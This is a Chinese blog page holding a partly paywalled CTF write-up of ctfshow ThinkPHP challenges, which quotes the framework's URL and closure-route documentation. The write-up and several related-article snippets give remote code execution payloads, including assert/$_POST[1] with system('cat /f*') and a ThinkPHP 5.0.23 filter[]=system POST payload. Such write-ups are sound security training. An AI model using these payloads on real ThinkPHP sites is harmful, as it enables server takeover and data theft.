ctfshow thinkPHP专题

最新推荐文章于 2022-07-23 00:50:14 发布
最新推荐文章于 2022-07-23 00:50:14 发布
阅读量230 收藏
点赞数
分类专栏: CTF题目 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45655564/article/details/120019748
版权

569-Thinkphp3.23的url访问规则

https://www.kancloud.cn/manual/thinkphp/1697

URL模式
入口文件是应用的单一入口,对应用的所有请求都定向到应用入口文件,系统会从URL参数中解析当前请求的模块、控制器和操作:

http://serverName/index.php/模块/控制器/操作 这是3.2版本的标准URL格式。

可以通过设置模块绑定或者域名部署等方式简化URL地址中的模块及控制器名称。

所以
访问
url/index.php/Admin/Login/ctfshowLogin即可

570-ThinkPHP3.23的闭包规则

https://www.kancloud.cn/manual/thinkphp/1710
闭包定义
我们可以使用闭包的方式定义一些特殊需求的路由,而不需要执行控制器的操作方法了,例如:

'URL_ROUTE_RULES'=>array(
    'test'        => 
        function(){
    
            echo 'just test';
        },
    'hello/:name' => 
        function($name){
    
            echo 'Hello,'.$name;
        }

参数传递
闭包定义的参数传递在规则路由和正则路由的两种情况下有所区别。

规则路由
规则路由的参数传递比较简单:

'hello/:name' => 
    function($name){
    
        echo 'Hello,'.$name;
    }

规则路由中定义的动态变量的名称 就是闭包函数中的参数名称,不分次序。 因此,如果我们访问的URL地址是: http://serverName/Home/hello/thinkphp

则浏览器输出的结果是: Hello,thinkphp

/index.php/ctfshow/assert/$_POST[1]
1=system("cat /f*")

571-thinkPHP3.23 show方法渲染模板

如果你没有定义任何## 标题模板文件,或者把模板内容存储到数据库中的话,你就需要使用show方法来渲染输出了,show方法的调用格式:

sho
最低0.47元/天 解锁文章
Anfy1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshowThinkphp
灰太的表格的博客
08-24 183
web569 web570 /index.php/Home/ctfshow/assert/eval($_GET[1])/?1=system("tac%20/f*"); 闭包路由:参考官方文档或博客 web571 给了源码,找到一处可以进行传参的控制器,传个参数在这,打个断点调下: 接着跟进去: 接着跟进: 我们最开始传的参数在content变量里,跟进到if(这里有个对于当前使用的一个模板的判断,由于不知道题目使用的是哪种所以我就用0,1了图方便): 往下走: 成功找到后门,conten
ctfshow_ThinkPHP专题
qq_45951598的博客
07-02 404
web569-- 路由 打开页面是这样的 这里的话推荐想看一下3.2.3的开发手册,网站地址是ThinkPHP3.2.3完全开发手册 不想看的,我就简单的截取一张图片来看一下 PATHINFO模式下面的URL访问地址是: http://localhost/index.php/home/user/login/var/value/ 然后根据提示直接构造就是了 payload:http://1a941035-d87a-4eea-9068-77062fa67c57.challenge.ctf.show:80
ctfshow ThinkPHP专题 1
qq_61768489的博客
07-23 727
PATHINFO模式是系统的默认URL模式,提供了最好的SEO支持,系统内部已经做了环境的兼容处理,所以能够支持大多数的主机环境。REWRITE模式是在PATHINFO模式的基础上添加了重写规则的支持,可以去掉URL地址里面的入口文件index.php,但是需要额外配置WEB服务器的重写规则。m参数表示模块,c参数表示控制器,a参数表示操作(当然这些参数都是可以配置的),后面的表示其他GET参数。,ThinkPHP支持的URL模式有四种普通模式、PATHINFO、REWRITE和兼容模式。...
ctfshow thinkphp专题
Sentiment的博客
05-25 1655
web569 主要就是考察了一个url解析模式 http://localhost/index.php/模块/控制器/操作/参数/值 payload: /index.php/Admin/Login/ctfshowLogin web570 Common/Conf/config.php,发现可利用点,一个闭包路由 'ctfshow/:f/:a' =>function($f,$a){ call_user_func($f, $a); } 传参发现也能正常执行 /index.php/ctfsho
Thinkphp 使用Dompdf
06-08
Thinkphp 使用Dompdf
ThinkPHP6.pdf
06-03
Thinkphp6入门到实战
thinkphp漏洞检测工具
06-06
thinkphp漏洞检测工具
thinkphp后台管理系统
04-06
thinkphp是一个基于thinkphp6的后台管理系统,对标laravel-admin。 think-admin特色: 1、composer库一键安装,丰富的配置项目 2、根据数据库自动生成增删改查,并生成相应的菜单和权限,减少基础机械重复工作 3、...
thinkphp6框架下载
04-21
thinkphp6框架下载
论文研究-基于ThinkPHP的网络安全演练竞技平台中CTF模块的设计与实现 .pdf
08-25
基于ThinkPHP的网络安全演练竞技平台中CTF模块的设计与实现,孙碧云,辛阳,针对于我国目前对网络安全人才实战性的培养需求,我们设计并实现了一个以ThinkPHP和Bootstrap框架为基础的网络安全演练竞技平台。平台�
CTFshow——thinkphp专题
D.MIND 的博客
06-12 1580
570——闭包路由 关注这段代码:这是闭包路由的用法,官方:手册闭包支持 我们用phpinfo()函数测试一下:是可以的 /index.php/ctfshow/phpinfo/1 注意因为eval是一个语言结构而不是函数,所以这里是不能被call_user_func调用的,而assert是一个函数。因此我想到了assert(system("ls"));,但在尝试ls /时却不行了,很迷。 然后我想着参数转移一下。然后下意识构造出这样: /index.php/ctfshow/assert/$_POST[1
ctfshow ThinkPHP篇575
羽的博客
08-05 754
web575 给了源码 $user= unserialize(base64_decode(cookie('user'))); if(!$user || $user->id!==$id){ $user = M('Users'); $user->find(intval($id)); cookie('user',base64_encode(serialize($user->data()))); } $this->show($user->username); } 首先引起注意的
Ctfshow web入门 thinkphp专题
feng的博客
04-25 3249
web569 看一下thinkphp3.2.3官方手册,看完就都懂了: ThinkPHP3.2.3完全开发手册 首先就是路由的方式: http://serverName/index.php/模块/控制器/操作 此外就是默认是不区分大小写的,由'URL_CASE_INSENSITIVE' => true,这个配置决定。 URL模式的话,默认是PATHINFO模式,即本题考察的模式。 直接访问即可: /index.php/admin/login/ctfshowlogin web570 下载源码,在C
ctfshow web入门(thinkphp专题)
qq_53263789的博客
02-09 715
569 URL模式 查阅手册:URL模式 · ThinkPHP3.2.3完全开发手册 http://serverName/index.php/模块/控制器/操作 payload: 普通模式:/?m=Admin&c=Login&a=ctfshowLogin Pathinfo模式:/index.php/Admin/Login/ctfshowLogin 兼容模式:/?s=/Admin/Login/ctfshowLogin 570 路由 发现路由: 根据手册: 直接构造:这里直接执行不可以
buuctf-Real-[ThinkPHP]5.0.23-Rce
weixin_46079186的博客
05-09 622
题目地址 和前两题一样,去找poc 找到poc ,使用查看一下效果有回显。 根据前两题经验,flag肯定在phpinfo 里面 ,所以直接修改一下,拿到flag
thinkphp5漏洞几道例题
wo41ge的博客
11-14 223
漏洞 具体看这里 ThinkPHP5.0.23(远程命令执行) 例题[BJDCTF 2nd]old-hack index.php?s=1查看版本 POST:_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls / POST:_method=__construct&filter[]=system&server[REQUEST_METHOD]=cat /flag ThinkPHP V5.0.20(远程
php foreach 不等于_php常见攻击手法之ThinkPHP
weixin_39655993的博客
12-15 176
前言“FSRC经验分享”系列文章,旨在分享焦点安全工作过程中的经验和成果,包括但不限于漏洞分析、运营技巧、SDL推行、等保合规、自研工具等。欢迎各位安全从业者持续关注~1本文简介PHP 是一种创建动态交互性站点的强有力的服务器端脚本语言,在各大互联网公司产品中使用广泛。php相关的攻击手法也很多,常见的如php伪协议、php爆路径、反序列化等。信息安全部新入职的同事Ba...
ctfshow-thinkphp
giaogiao123的博客
08-23 862
基础知识 关于thinkphp需要知道的基本知识 https://www.kancloud.cn/manual/thinkphp/1696 demo1 修改 D:\phpStudy\PHPTutorial\WWW\thinkphp-3.2\thinkphp-3.2\Application\Home\Controller\IndexController.class.php <?php namespace Home\Controller; use Think\Controller; class Inde
ctfshow thinkphp
最新发布
08-28
对于thinkphp的CTF演示,可以分享一些基本的信息和注意事项: 1. ThinkPHP是一款基于PHP语言开发的开源框架,被广泛应用于Web开发中。 2. 在CTF比赛中,可能会出现与ThinkPHP相关的题目,例如利用ThinkPHP的漏洞进行渗透、代码审计等。 3. 常见的一些ThinkPHP漏洞包括:SQL注入、远程代码执行、文件上传漏洞等,参赛选手可以针对这些漏洞进行挑战。 4. 在解决ThinkPHP题目时,可以通过查阅官方文档、了解框架的特性和安全机制,以及使用一些常见的安全工具(如静态代码分析工具、漏洞扫描工具等)来辅助解题。 5. 注意在CTF比赛中遵守竞赛规则和法律法规,不得在未授权的系统上进行渗透测试或攻击行为。 希望以上信息对你有所帮助!如有更多问题,请继续提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值